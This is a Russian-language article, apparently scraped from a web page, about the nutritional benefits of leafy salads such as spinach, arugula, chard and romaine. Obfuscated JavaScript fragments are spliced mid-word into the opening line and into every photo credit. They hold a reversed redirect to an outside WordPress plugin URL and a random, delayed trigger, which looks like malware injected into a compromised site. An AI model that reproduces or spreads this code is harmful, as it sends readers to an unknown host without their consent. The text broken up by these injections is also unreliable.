Специально к Дню вегана редакция fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru подготовила подборку самых полезных салатов. Включить побольше зелени в меню будет полезно не только тем, кто следует принципам веганской диеты, но и убеждённым мясоедам: судя по всему, салаты способствуют сохранению здоровья сердечно-сосудистой системы, а также помогают дольше оставаться в здравом уме и трезвой памяти.
Что в салатах особенного
Самая питательная и метаболически активная часть у большинства овощей — листья. Это значит, что в листьях содержится больше всего витаминов, железа, цинка, кальция и магния. Причём чем темнее и насыщеннее зелень, тем лучше: в тёмно-зелёных листовых овощах обычно больше витаминов В6, А, С, К, Е и других питательных веществ, чем в более светлых.
Фото: shutterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock.com
Кроме того, в зелёных салатах в большом количестве содержатся бета-каротиноиды — предшественники витамина А, а также фолаты — растительная форма витамина В9.
Бета-каротиноиды способствуют уменьшению воспалительного процесса в организме. Вместе с нитратами и флавоноидами, которых тоже много в зелёных овощах, они помогают избегать сердечно-сосудистых и возрастных заболеваний, связанных с нарушениями в работе мозга.
Фолаты (растительная форма витамина В9) необходимы для создания ДНК, участвуют в синтезе аминокислот — «строительных кирпичиков» для белков — и «вовлекают» в обмен веществ другие витамины. Витамин В9 особенно важен для беременных и женщин, которые планируют беременность, — это вещество необходимо для нормального роста и внутриутробного развития ребёнка.
Хотя зелёные салаты полезны в принципе, разные его виды отличаются и по вкусу, и по содержанию питательных веществ. Мы решили рассказать о тех салатах, в которых тех или иных полезных веществ содержится больше, чем в остальных разновидностях этого продукта.
Шпинат
Каков на вкус. У шпината гладкие листья, нежная структура и чуть горьковатый вкус, поэтому шпинат часто рекомендуют смешивать с другими видами салата или дополнять соком лимона — так он станет менее горьким.
Что в нём особенного. В 100 граммах шпината содержится 79 мг магния. Это не так уж много, ведь потребность в магнии у взрослых людей — 400 мг в сутки. Зато из шпината и других зелёных салатов магний усваивается в организме человека на 40–60%, для сравнения: из бобовых, зерновых и орехов магний усваивается только на 20–30%, а в животной пище и молочных продуктах его содержится очень мало. При этом магний необходим для синтеза белков, ДНК и поддержания здорового давления.
Фото: shutterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock.com
Корн
Каков на вкус. У салата корн мягкие, не хрустящие листья и нежный, чуть сладковатый вкус — некоторые люди отмечают лёгкий ореховый привкус и аромат.
Что в нём особенного. В 100 граммах корна содержится 355 мкг витамина А — это больше трети дневной нормы (900 мкг) для взрослых. Витамин необходим для нормального роста, поддержания здоровья кожи, костей, иммунитета и хорошего зрения.
Фото: shutterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock.com
Лолло Россо
Каков на вкус. Яркий красный салат с ореховым привкусом. Может немного горчить, поэтому повара рекомендуют смешивать его с другими, менее горькими салатами или добавлять в другие блюда, чтобы дополнить их вкус.
Что в нём особенного. Рекордсмен по содержанию бета-каротина — в 100 граммах «Лолло Россо» содержится 4495 мкг этого вещества. Бета-каротин — предшественник витамина А, который обладает защитными свойствами и сам по себе.
Фото: shutterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock.com
Рукола
Какова на вкус. Сочный салат с острым привкусом — некоторые люди отмечают в нём нотки горчицы и орехов. Если рукола вам кажется горькой, можно смешать её с другими салатами, которые обладают нейтральным вкусом.
Что в ней особенного. В 100 граммах руколы содержится 108,6 мкг витамина К — это количество почти равно дневной норме (120 мкг) для взрослых. Витамин К необходим для нормальной свёртываемости крови и важен для здоровья костной ткани.
Фото: shutterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock.com
Мангольд (листовая свёкла)
Какова на вкус. Листовая свёкла очень похожа на обычную — правда, в виде салата она более нежная на вкус.
Что в ней особенного. В листовой свёкле больше пищевых волокон (клетчатки), чем в любом другом салате: в 100 граммах содержится 1,6 грамма. Пищевые волокна очень нужны полезным бактериям, которые живут в кишечнике и создают бутират — вещество, защищающее кишечник от воспаления и снижающее риск развития диабета 2 типа. Это очень важно, потому что вырабатывать бутират самостоятельно организм человека не умеет.
Правда, чтобы получить достаточно клетчатки, одного салата будет мало: взрослым нужно 20 граммов пищевых волокон в сутки. Придётся подключать другие здоровые растительные продукты: овощи, фрукты, бобовые и зерновые. В них клетчатки куда больше — например, всего в одном целом яблоке содержится 4,5 грамма пищевого волокна.
Фото: shutterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock.com
Ромейн
Каков на вкус. У ромейна гладкие, сочные и хрустящие листья с насыщенным, но не горьким вкусом. Ромейн — основной ингредиент знаменитого салата «Цезарь», а ещё его часто добавляют в сэндвичи и другие блюда.
Что в нём особенного. В 100 граммах салата ромейн содержится 136 мкг фолата — это больше трети дневной нормы (400 мкг) для взрослых.
Фото: shutterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock.com
Что ещё важно знать о салатах
Салаты растут в земле, так что на них могут попасть вредные микробы. Чтобы хорошенько промыть салат и наверняка избавиться от загрязнений, листья следует положить в миску и залить холодной водой на пять минут — это поможет разрыхлить налипшую землю и осадить песок на дно миски. После этого салат нужно промыть под прохладной проточной водой.
Кстати, мыть нужно не только салаты, купленные пучком на рынке, но и смеси салатов, которые продаются в пластиковой упаковке. На такие салаты тоже могут попасть микробы, например когда салаты нарезают.
И не забывайте: салаты — важная часть рациона, но далеко не единственная. Питание должно быть сбалансированным, а рацион — разнообразным. Именно эти принципы помогут вам поддерживать здоровье организма.
Статьи по теме
Лёгкий салат с кукурузой и авокадо
Как приготовить сытные и полезные салаты: 10 рецептов до 400 калорий
Продукты, богатые клетчаткой, снижают риск болезни суставов
7 лучших кафе и ресторанов правильного питания в Москве